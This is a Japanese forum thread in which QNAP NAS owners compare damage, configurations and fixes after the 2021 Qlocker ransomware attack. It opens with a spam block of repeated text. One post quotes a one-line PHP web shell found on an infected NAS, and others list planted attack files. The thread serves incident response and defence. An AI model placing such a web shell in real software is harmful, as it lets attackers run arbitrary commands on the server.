金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
89不明なデバイスさん (ブーイモ MMfd-2tiM)
2021/04/23(金) 10:31:26.42ID:uuqRoYoZM90不明なデバイスさん (ワッチョイ 245f-hzqe)
2021/04/23(金) 10:52:23.53ID:oUNsi+RB0 新機種買ったので現有機器をローカル限定に切り替えたところだった。
ギリギリセーフw
ギリギリセーフw
91不明なデバイスさん (ワッチョイ 3868-bceD)
2021/04/23(金) 10:58:48.59ID:NK8iVUJW0 流れと関係ないけどTS-231Pを4.5.2 Build 20210406に上げたらWebDAVに繋がらなくなった
92不明なデバイスさん (ワッチョイ 07ca-+ZbI)
2021/04/23(金) 11:00:05.25ID:bICER9Vj0 とりあえず今回のランサムウェア緊急回避対策
・最新のHBS3に更新
・QNAPの外向きサービスとの紐付け解除
・UPnP停止
・最新のMalware Removerをインストール
出来るならネットワークから切り離してスタンドアロン環境で様子見もあり
・最新のHBS3に更新
・QNAPの外向きサービスとの紐付け解除
・UPnP停止
・最新のMalware Removerをインストール
出来るならネットワークから切り離してスタンドアロン環境で様子見もあり
93不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/23(金) 11:01:31.16ID:gJPKi2eM0 7zのパス出させる方法は手遅れだったので
小さいファイルを32桁開始で総当たりする解析スクリプト回し始めた
たぶん無理
小さいファイルを32桁開始で総当たりする解析スクリプト回し始めた
たぶん無理
94不明なデバイスさん (ブーイモ MMed-2tiM)
2021/04/23(金) 11:48:07.81ID:V/HJjc+pM うちので外とやり取りあるのはこれだけ。
DDNS noipで更新
NTP nict
L2TP
インバウンドはNAS以外を含めてもL2TPしか通してない。
それ以外はブロードバンドルータで止めてる。
myQNAPはアカウント自体を作ってない。
これなら大丈夫だよな?
昨晩確認した限りではルータにはアメリカとかチェコから1時間に数件のpingがあった程度。
NASにはadminとL2TP用のユーザでのログインログしかなかった。
DDNS noipで更新
NTP nict
L2TP
インバウンドはNAS以外を含めてもL2TPしか通してない。
それ以外はブロードバンドルータで止めてる。
myQNAPはアカウント自体を作ってない。
これなら大丈夫だよな?
昨晩確認した限りではルータにはアメリカとかチェコから1時間に数件のpingがあった程度。
NASにはadminとL2TP用のユーザでのログインログしかなかった。
95不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 12:03:43.99ID:Gx4/OGZO0 /usr/local/sbin/7z がシェルスクリプトに変更されている
96不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 12:13:38.26ID:Gx4/OGZO097不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 12:21:27.70ID:Gx4/OGZO0 攻撃を受けた人って
/root/re.sh
/mnt/ext/opt/apps/backup.php
のファイルがある?
/root/re.sh
/mnt/ext/opt/apps/backup.php
のファイルがある?
98不明なデバイスさん (ワッチョイ 969b-S8++)
2021/04/23(金) 12:26:36.04ID:SBUfgyfH0 なにがショックってスナップショットが全く役に立たなかったってこと
意味ないじゃん・・・
意味ないじゃん・・・
99不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/23(金) 12:27:07.46ID:iCRSyXOg0100不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 12:48:42.09ID:Gx4/OGZO0 >>99
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと
101不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/23(金) 13:04:22.83ID:q94oGlmY0 >>89
upnpはどうなんだろう?本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。
>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021
>>94
今回の件とは別件だけど、adminに対して1日で1000件以上(途中から数えるのを止めた)のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。
>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの?
>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。
upnpはどうなんだろう?本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。
>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021
>>94
今回の件とは別件だけど、adminに対して1日で1000件以上(途中から数えるのを止めた)のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。
>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの?
>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。
102不明なデバイスさん (ブーイモ MMed-0PTu)
2021/04/23(金) 13:09:45.78ID:bD92dHctM 帰ったら俺もNAS確認しよ、月曜日にはHBS3がUSBHDDを上書きしちゃう!
103不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/23(金) 13:17:18.52ID:iCRSyXOg0104不明なデバイスさん (ブーイモ MMed-Rk3w)
2021/04/23(金) 13:56:37.50ID:/H/TJXmxM105不明なデバイスさん (ブーイモ MMfd-2tiM)
2021/04/23(金) 13:57:47.85ID:Fypb96zdM106不明なデバイスさん (ブーイモ MMfd-9+qx)
2021/04/23(金) 13:58:07.13ID:jEDYAQ4DM ポート開放、adminの無効化、2要素認証、ポート変更は関係なく、myQNAPcloud経由でアクセスを許可してる人が侵入されるのかな?
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。
107不明なデバイスさん (ワッチョイ 4259-X3sy)
2021/04/23(金) 14:08:16.64ID:gJPKi2eM0 これQNAPどう落とし前つけるの?
修正バージョン配ってロックかかった人は残念だったねで終わり?
修正バージョン配ってロックかかった人は残念だったねで終わり?
109不明なデバイスさん (ワッチョイ fb6e-BqgI)
2021/04/23(金) 14:39:50.64ID:QTm3pHRK0 使用条件に入ってるだろ
いかなる理由があってもデータの損失に責任を負わないって
これに同意しなければそもそも使えない
どんなソフトでもハードでも同じ
ゼロデイだろうがそうでなかろうが関係ない
バックアップ取るのはユーザーの責任
ガタガタ騒ぐな
いかなる理由があってもデータの損失に責任を負わないって
これに同意しなければそもそも使えない
どんなソフトでもハードでも同じ
ゼロデイだろうがそうでなかろうが関係ない
バックアップ取るのはユーザーの責任
ガタガタ騒ぐな
110不明なデバイスさん (ワッチョイ a45f-On6t)
2021/04/23(金) 14:57:39.07ID:DPWaRh3C0 windows狙い撃ちのウイルスに感染したってMSがなんか保証するわけじゃないしな
111不明なデバイスさん (ワッチョイ d205-Iq6q)
2021/04/23(金) 15:05:38.37ID:w0popk/h0 使用条件にはQNAPを崇め奉らなければQNAPは使えないとは書かれていない
ならばガタガタ騒ぐも開発の無能さを嘆くも ユーザーの勝手 というわけだから
俺は騒ぐ分には大いに騒いでいいと思うぜ
特にこの件はな
ならばガタガタ騒ぐも開発の無能さを嘆くも ユーザーの勝手 というわけだから
俺は騒ぐ分には大いに騒いでいいと思うぜ
特にこの件はな
112不明なデバイスさん (ラクッペペ MM34-7AFf)
2021/04/23(金) 15:11:13.41ID:g+UCuPFwM 大切なデータは正副予備の3段構えにしとけと
俺は言ってなかったわ(´・ω・`)
俺は言ってなかったわ(´・ω・`)
113不明なデバイスさん (ワッチョイ 8cbb-BgAO)
2021/04/23(金) 15:11:36.75ID:uXnE/iYQ0 結局のところ、クラウド経由のリモートアクセスみたいな飛び道具は危険って結論だよね。
「絶対」はないから、QNAPに限らず、どんな製品でも言えること。
「絶対」はないから、QNAPに限らず、どんな製品でも言えること。
115不明なデバイスさん (ワッチョイ 07ca-+ZbI)
2021/04/23(金) 15:17:16.76ID:bICER9Vj0 家の玄関を見せれば泥棒は何とかして忍び込もうとするものだ
116不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 15:20:28.74ID:Gx4/OGZO0 取り合えずやることはこれくらかな
1.Malware Removerを最新にしてスキャン
マルウェア実行中であればパスワードが保存できる
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
2.すべてのアプリを最新版に更新
3.ルーターのUPnP機能停止
1.Malware Removerを最新にしてスキャン
マルウェア実行中であればパスワードが保存できる
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
2.すべてのアプリを最新版に更新
3.ルーターのUPnP機能停止
117不明なデバイスさん (ワッチョイ 4259-X3sy)
2021/04/23(金) 15:22:42.10ID:gJPKi2eM0 いっそのこともう一回マルウェア実行してくれ…
118不明なデバイスさん (エアペラ SD5a-Q9US)
2021/04/23(金) 15:38:43.01ID:jUDl+BTHD119不明なデバイスさん (ワッチョイ fb6e-BqgI)
2021/04/23(金) 15:50:11.63ID:QTm3pHRK0 某巨大ストレージベンダーが脆弱性突かれたとかでなく自分のトコのファームウェアのせいで世界中で企業のデータ完全に吹っ飛ばしたときでさえ使用許諾条件盾に一切保証なし。
しかも同じストレージ使ってバックアップ取ってたトコはバックアップまで全部飛んだというオマケ付き
ハードソフトはそういう世界
見限ってベンダー変えるのも自由
しかも同じストレージ使ってバックアップ取ってたトコはバックアップまで全部飛んだというオマケ付き
ハードソフトはそういう世界
見限ってベンダー変えるのも自由
120不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 16:02:00.24ID:Gx4/OGZO0 >>101
/mnt/ext/opt/apps/backup.php が外部からHTTPで
NAS上の任意のコマンドを実行するためのコマンドのようだね
ということは/root/re.shがスナップショットを無効化するためのコマンドかな
/root/r.py も今回の攻撃に関係しているみたい
/mnt/ext/opt/apps/backup.php が外部からHTTPで
NAS上の任意のコマンドを実行するためのコマンドのようだね
ということは/root/re.shがスナップショットを無効化するためのコマンドかな
/root/r.py も今回の攻撃に関係しているみたい
121不明なデバイスさん (スップ Sdc4-d95O)
2021/04/23(金) 16:02:58.24ID:nZ8tC4jrd この件で対策強化されて安全になるやろ
122不明なデバイスさん (ワッチョイ c6df-On6t)
2021/04/23(金) 16:11:22.76ID:8F3ONT/w0 QSnatchで安全になったもんな(棒
124不明なデバイスさん (ワッチョイ bd10-KIHW)
2021/04/23(金) 17:04:41.80ID:y79dWhdv0 なんかスレが進んでいたので見たらゼロデイ攻撃があったのか。
IPoE(MAP-E)+Firewall+NASのIPv6無効+myQNAPCloud未登録なので
影響はないと思うけど、アップデートしておこう。
何やっているか分からないモノを外部に晒すのはちょっと怖いのでNASだけ
IPv6アドレス付与切っておいたけど、今回は正解だったか。
外付けディスクにバックアップしてる人に聞きたいのだけど、
バックアップスケジュールってどうしてる? 手動?
自動スケジュールで外付けディスク繋ぎっぱなしだとランサムウェアの
被害に遭いそうだけど、毎回手動でUSBケーブルを抜き差しするのも面倒そう…
IPoE(MAP-E)+Firewall+NASのIPv6無効+myQNAPCloud未登録なので
影響はないと思うけど、アップデートしておこう。
何やっているか分からないモノを外部に晒すのはちょっと怖いのでNASだけ
IPv6アドレス付与切っておいたけど、今回は正解だったか。
外付けディスクにバックアップしてる人に聞きたいのだけど、
バックアップスケジュールってどうしてる? 手動?
自動スケジュールで外付けディスク繋ぎっぱなしだとランサムウェアの
被害に遭いそうだけど、毎回手動でUSBケーブルを抜き差しするのも面倒そう…
125不明なデバイスさん (ワッチョイ 8cbb-BgAO)
2021/04/23(金) 17:21:08.69ID:uXnE/iYQ0 ランサムウェアにやられた後のをバックアップしたら意味がないし、複数世代のバックアップをリモートサイトに取っておくのが一番だよね。
うちは毎日同期しちゃってるからデータ改変には効果がないけど、外付けディスクと実家のNASにコピーしてる。
うちは毎日同期しちゃってるからデータ改変には効果がないけど、外付けディスクと実家のNASにコピーしてる。
126不明なデバイスさん (ラクッペペ MM34-7AFf)
2021/04/23(金) 18:00:17.02ID:g+UCuPFwM 取引先から被害報告なくてちょっとガッカリ(´・ω・`)
127不明なデバイスさん (テテンテンテン MM34-udT0)
2021/04/23(金) 18:24:44.35ID:slUpuUDqM うちは全然被害に遭ってないっぽい
qnapcloud使っててもセーフなケースあり?
qnapcloud使っててもセーフなケースあり?
129不明なデバイスさん (ワッチョイ 9c4f-Nexr)
2021/04/23(金) 19:28:09.10ID:TvZqdhvH0 全くわからん!
[/share/CACHEDEV1_DATA/.qpkg/MalwareRemover] # cat 7z.log
/usr/local/sbin/7z.orig
/proc/21060:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
/usr/local/sbin/7z.orig
/proc/28651:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
[/share/CACHEDEV1_DATA/.qpkg/MalwareRemover] # cat 7z.log
/usr/local/sbin/7z.orig
/proc/21060:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
/usr/local/sbin/7z.orig
/proc/28651:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
130不明なデバイスさん (ワッチョイ 0e02-9+qx)
2021/04/23(金) 19:43:15.07ID:NfMEXmqj0 https://www.cybersecurity-help.cz/blog/2064.html
QNAPは、攻撃者がCVE-2020-36195(※)の脆弱性を悪用してデバイス上でランサムウェアを実行していると考えていると述べた。
※SQL injection in QNAP Multimedia Console and Media Streaming Add-On
myqnapcloudがあってもセーフなのはマルチメディア系アプリが入ってないという可能性もあるかな
QNAPは、攻撃者がCVE-2020-36195(※)の脆弱性を悪用してデバイス上でランサムウェアを実行していると考えていると述べた。
※SQL injection in QNAP Multimedia Console and Media Streaming Add-On
myqnapcloudがあってもセーフなのはマルチメディア系アプリが入ってないという可能性もあるかな
131不明なデバイスさん (ワッチョイ 2d07-sKTo)
2021/04/23(金) 19:45:09.67ID:vmZ8/Qfr0 うちも被害ないっぽい
マルチメディア系は切ってる
マルチメディア系は切ってる
132不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 19:47:24.45ID:Gx4/OGZO0 >>129
暗号化のオプションを指定した場合は /usr/local/sbin/7z.orig の後にパスワードが表示される
> /usr/local/sbin/7z.orig "-p" "password"
暗号化のオプションを指定した場合は /usr/local/sbin/7z.orig の後にパスワードが表示される
> /usr/local/sbin/7z.orig "-p" "password"
133不明なデバイスさん (テテンテンテン MM34-udT0)
2021/04/23(金) 19:58:33.16ID:slUpuUDqM >>128
ぶっちゃけあんまり手の込んだ設定はしてないと思う
マルチメディア系も結構使っててQVideoやら大概のやつは入ってる
adminもそのまま、一応長いパスワードではあるけど関係無いんだよね?
ただ、イントラ内だとhttp://nas名ではアクセス不可
nas内にwindowsserver入れてiisとapache同居環境とか
変な事やってる余波で別のipじゃないと管理画面に行かない
lanは5本生えてて全部接続してる
ぶっちゃけあんまり手の込んだ設定はしてないと思う
マルチメディア系も結構使っててQVideoやら大概のやつは入ってる
adminもそのまま、一応長いパスワードではあるけど関係無いんだよね?
ただ、イントラ内だとhttp://nas名ではアクセス不可
nas内にwindowsserver入れてiisとapache同居環境とか
変な事やってる余波で別のipじゃないと管理画面に行かない
lanは5本生えてて全部接続してる
134不明なデバイスさん (ワッチョイ 9c4f-Nexr)
2021/04/23(金) 20:00:38.82ID:TvZqdhvH0 >>132
今日初めてLinuxコマンドなんて打ったもんだから、こんな感じで良いんか分からんす...
Unsupported commandって言われてるから、多分やり方が違うんだろうな
[/usr] # /usr/local/sbin/7z.orig "-p" "password"
7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)
Command Line Error:
Unsupported command:
password
今日初めてLinuxコマンドなんて打ったもんだから、こんな感じで良いんか分からんす...
Unsupported commandって言われてるから、多分やり方が違うんだろうな
[/usr] # /usr/local/sbin/7z.orig "-p" "password"
7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)
Command Line Error:
Unsupported command:
password
135不明なデバイスさん (ワッチョイ b692-0PTu)
2021/04/23(金) 20:05:09.12ID:By7MvMqJ0 今帰って確認したけど、大丈夫ぽいかな?
マルチメディア系入ってるし、myQnapcloudも動いてる状態。
マルチメディア系入ってるし、myQnapcloudも動いてる状態。
136不明なデバイスさん (ワッチョイ dc3d-Tc22)
2021/04/23(金) 20:07:48.87ID:BYQMiACs0 QTSやMalware Removerを最新に更新していたら影響は無かったのでしょうか?
137不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 20:10:56.49ID:Gx4/OGZO0 /usr/local/sbin/7z が元のバイナリに戻っている…
138不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 20:15:49.46ID:Gx4/OGZO0 HBS 3 Hybrid Backup Sync と Malware Remover の更新が来ている
HBS 3 Hybrid Backup Syncの修正内容がかなりヤバそう…
HBS 3 Hybrid Backup Syncの修正内容がかなりヤバそう…
139不明なデバイスさん (ワッチョイ 0e02-9+qx)
2021/04/23(金) 20:37:53.30ID:NfMEXmqj0 修正も手探りなのかね。この感じだと特に必須でないなら、マルチメディア系、HBS3 backup syncは一旦停止させ、バックアップの外付けhddは外しておいた方が安全なのかもね。大丈夫な人もこれから攻撃来るかもしれないわけだし。
140不明なデバイスさん (ブーイモ MM5e-HDr5)
2021/04/23(金) 20:39:23.48ID:v4+aZER6M バックアップなんてローカルでスケジュールでやりたい
だけなんだけどな… このアプリ重厚過ぎ
だけなんだけどな… このアプリ重厚過ぎ
141不明なデバイスさん (ブーイモ MM5e-60kV)
2021/04/23(金) 20:47:08.10ID:u1LkmtzBM バックアップは簡素で軽いのがいいという人は
rsync を叩くシェルスクリプトを用意して cron で起こすとか
rsync を叩くシェルスクリプトを用意して cron で起こすとか
142不明なデバイスさん (ワッチョイ 8a68-tA8s)
2021/04/23(金) 20:49:18.69ID:iHrZYhIX0 大丈夫そうで電源切った
外からのアクセスはしてなくてmyqnapcloudも使ってない
取り敢えずルーターのupnp切って外付けHDD外した、次はOSとHBS3とMalR.のバージョンアップしたら大丈夫なんだろうか
外からのアクセスはしてなくてmyqnapcloudも使ってない
取り敢えずルーターのupnp切って外付けHDD外した、次はOSとHBS3とMalR.のバージョンアップしたら大丈夫なんだろうか
143不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/23(金) 20:50:07.20ID:gJPKi2eM0 ・シャットダウンした
・ファームとMalware Removerを更新した
・その後7zの暗号が取得できなかった
人に聞きたいんだけど、その後起動したときにHDDの動作音聞こえる?
自分のQNAPがその状況なんだけど起動したときにずっとHDDの動作音してて
何かよからぬものが動いてるはずなんだけど圧縮が進んでるようには見えなくて気味が悪いんだよね
・ファームとMalware Removerを更新した
・その後7zの暗号が取得できなかった
人に聞きたいんだけど、その後起動したときにHDDの動作音聞こえる?
自分のQNAPがその状況なんだけど起動したときにずっとHDDの動作音してて
何かよからぬものが動いてるはずなんだけど圧縮が進んでるようには見えなくて気味が悪いんだよね
144不明なデバイスさん (ワッチョイ 5e63-zK2t)
2021/04/23(金) 20:55:04.14ID:YJ2zlXCz0 >>127
それはあると思うよ。攻撃者も一意の攻撃先に攻撃してる訳じゃないだろし、処理にも時間がかかるからタイムラグがあって当然だし。
攻撃されない(攻撃対象にならない、なれない)ことだってあると思う。
それはあると思うよ。攻撃者も一意の攻撃先に攻撃してる訳じゃないだろし、処理にも時間がかかるからタイムラグがあって当然だし。
攻撃されない(攻撃対象にならない、なれない)ことだってあると思う。
145不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 21:03:03.03ID:fBx4bygzM 7zやられたー・・・
でも、.Qsyncは無傷だった。
隠しフォルダには手を着けないのかしら。
でも、.Qsyncは無傷だった。
隠しフォルダには手を着けないのかしら。
146不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 21:05:39.99ID:Gx4/OGZO0 とりあえず最低限読んでおいた方がいいもの(すべて正しいとは限らないけど)
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z-read-metxt/page-32#entry5171881
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z-read-metxt/page-32#entry5171881
147不明なデバイスさん (オッペケ Sr72-2tiM)
2021/04/23(金) 21:14:57.83ID:Q20yzlwLr 外からアクセスして確認→無事。
導入時にセキュリティガチガチにしてたのが功を奏したのかな
導入時にセキュリティガチガチにしてたのが功を奏したのかな
148不明なデバイスさん (アウアウウー Sa30-/2HD)
2021/04/23(金) 21:19:05.84ID:LfmthOV3a myqnapcloudからアクセスして確認したら
手持ち3台とも無事だったみたい
手持ち3台とも無事だったみたい
149不明なデバイスさん (ワッチョイ 3f2d-H1Bl)
2021/04/23(金) 21:25:19.36ID:SIjBCSGD0 この時期に論理障害が起きてシャットダウンさせたのは、不幸中の幸いだったのかもしれない。
150不明なデバイスさん (ワッチョイ 8cbb-Nexr)
2021/04/23(金) 21:36:38.52ID:WCUbj3Ny0 ウチも平気だった。
クラウド系停止して最新Verに全更新完了。ついでに2段階認証も付けた。
IPoE(DS-Lite)+NASのIPv6無効+myQNAPCloud 利用していた。
Admin生きていたけど、前回大騒ぎになっていた1月時点で当時の最新Verに更新していた。
クラウド系停止して最新Verに全更新完了。ついでに2段階認証も付けた。
IPoE(DS-Lite)+NASのIPv6無効+myQNAPCloud 利用していた。
Admin生きていたけど、前回大騒ぎになっていた1月時点で当時の最新Verに更新していた。
151不明なデバイスさん (ブーイモ MM5e-2tiM)
2021/04/23(金) 21:37:44.14ID:cn5dDDmeM パスワード15文字以上あるからadmin使ってても大丈夫だよね?
152不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 21:47:42.19ID:fBx4bygzM 頑張っていたこと
admin無効
パスワード13文字(数字、記号込み)
2段階認証使用
反省点
myqnapcloud使っていた
ルータが10年前のNTTのONU
hybrid backup sync 3でクラウドドライブと連携していた
1ヶ月くらいアップデートサボってた。
.Qsyncが無事だったのは不幸中の幸い。そして暗号化されたデータも最近バックアップ取っていたから、被害は少なくて済んだ。
これって、データを詐取されてダークウェブで公開されたりとかしないよね?
admin無効
パスワード13文字(数字、記号込み)
2段階認証使用
反省点
myqnapcloud使っていた
ルータが10年前のNTTのONU
hybrid backup sync 3でクラウドドライブと連携していた
1ヶ月くらいアップデートサボってた。
.Qsyncが無事だったのは不幸中の幸い。そして暗号化されたデータも最近バックアップ取っていたから、被害は少なくて済んだ。
これって、データを詐取されてダークウェブで公開されたりとかしないよね?
154不明なデバイスさん (ブーイモ MM5e-2tiM)
2021/04/23(金) 21:56:01.69ID:cn5dDDmeM myqnapcloudのサーバ側が乗っ取られたわけでもなさそうなのになんでそこが侵入経路になったんだろうか。
155不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 21:59:01.20ID:fBx4bygzM156不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 22:02:19.48ID:Gx4/OGZO0 myQNAPcloudはデフォルトではインターネット公開されて
myQNAPcloudユーザであればだれでも検索できるらしいから
myQNAPcloudユーザであればだれでも検索できるらしいから
157不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/23(金) 22:10:12.25ID:iCRSyXOg0 myqnapcloudのサイトで検索できるしくみもあるんだけど
文字列生成して 53/udp というのが
文字列生成して 53/udp というのが
158不明なデバイスさん (ワッチョイ ba7c-xYSY)
2021/04/23(金) 22:12:14.06ID:4bxuXQsT0159不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/23(金) 22:26:20.22ID:f9jkfur/0 >>152のテンプレ少し改良してみた
■被害=無し
※認証関係
admin 有効
パスワード 15文字(数字、記号込み)
2段階認証 使ってない
※NW関係
myqnapcloud 未登録&未稼働
VPN利用 L2TP
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
■被害=無し
※認証関係
admin 有効
パスワード 15文字(数字、記号込み)
2段階認証 使ってない
※NW関係
myqnapcloud 未登録&未稼働
VPN利用 L2TP
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
160不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 22:47:35.37ID:fBx4bygzM >>159
乗っかってみる
■被害=蟻
※認証関係
admin 無効
パスワード 13文字(数字、記号込み)
2段階認証 使っている
※NW関係
myqnapcloud 稼働中
VPN利用 L2TP
ルータ 10年前のNTTのONU
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync クラウドドライブと同期
media streaming addon 無効
webサーバ 無効
ssh 無効
OS build 電源切っちゃったし、再投入もしたくないので不明
>>159との違いで怪しいのはmyqnapcloudとhybrid backup syncってことなのかなあ。正直、初めはなぜ侵入されたのか理解できなくて心底恐怖だった。手持ちのPCやスマートフォンが全て侵入経路に見えて、全部電源切って触れなかったもん。今になってみると、やはりQNAP NAS(とそのソフトウェア)そのものの脆弱性に漬け込んだ攻撃だったんだろうなと、信じつつある。
乗っかってみる
■被害=蟻
※認証関係
admin 無効
パスワード 13文字(数字、記号込み)
2段階認証 使っている
※NW関係
myqnapcloud 稼働中
VPN利用 L2TP
ルータ 10年前のNTTのONU
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync クラウドドライブと同期
media streaming addon 無効
webサーバ 無効
ssh 無効
OS build 電源切っちゃったし、再投入もしたくないので不明
>>159との違いで怪しいのはmyqnapcloudとhybrid backup syncってことなのかなあ。正直、初めはなぜ侵入されたのか理解できなくて心底恐怖だった。手持ちのPCやスマートフォンが全て侵入経路に見えて、全部電源切って触れなかったもん。今になってみると、やはりQNAP NAS(とそのソフトウェア)そのものの脆弱性に漬け込んだ攻撃だったんだろうなと、信じつつある。
161不明なデバイスさん (ワッチョイ d48e-iMGS)
2021/04/23(金) 22:57:12.81ID:Xl8Cu7Hr0163不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 23:02:37.80ID:fBx4bygzM >>161
返す言葉もないけど、ONUなんてそう気軽に交換できるものでも無いわけですよ
返す言葉もないけど、ONUなんてそう気軽に交換できるものでも無いわけですよ
164不明なデバイスさん (ワッチョイ 6e49-On6t)
2021/04/23(金) 23:06:10.52ID:U2N+YGbU0 まぁホームゲートウェイのことだとは思う
165不明なデバイスさん (ワッチョイ 2e22-1bRV)
2021/04/23(金) 23:10:03.42ID:w5QCkDxM0 んじゃ自分もとりあえず報告しとく。
■被害=無し
※認証関係
admin 無効
HTTPSのみ有効
P/W それなりに複雑
2段階認証 有効
OpenSSL+証明書インストール済み
※NW関係
NASサービス 公開なし
システムポート 変更済み
